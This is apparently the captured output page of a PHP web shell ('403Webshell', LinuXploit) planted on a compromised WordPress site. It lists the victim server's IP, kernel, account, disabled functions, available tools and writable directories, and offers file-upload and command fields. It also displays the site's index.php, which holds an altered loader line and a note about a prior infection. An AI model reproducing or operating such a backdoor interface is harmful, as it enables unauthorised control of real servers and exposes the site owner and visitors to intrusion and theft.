403Webshell
Server IP : 92.249.45.152  /  Your IP : 216.73.217.137
Web Server : LiteSpeed
System : Linux zap.boxsecured.com 4.18.0-553.53.1.lve.el8.x86_64 #1 SMP Wed May 28 17:01:02 UTC 2025 x86_64
User : afriqueacier ( 1976)
PHP Version : 8.0.30
Disable Function : symlink,shell_exec,exec,popen,system,dl,passthru,escapeshellarg,escapeshellcmd,show_source,pcntl_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/afriqueacier/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/afriqueacier/public_html/index.php
<?php
define( 'WP_USE_THEMES', true );
if(file_exists(__DIR__ . '/wp-blog-header.php') == true){ require __DIR__ . '/wp-blog-header.php'; /*rc1*/}
?>
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

  
/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/

Youez - 2016 - github.com/yon3zu
LinuXploit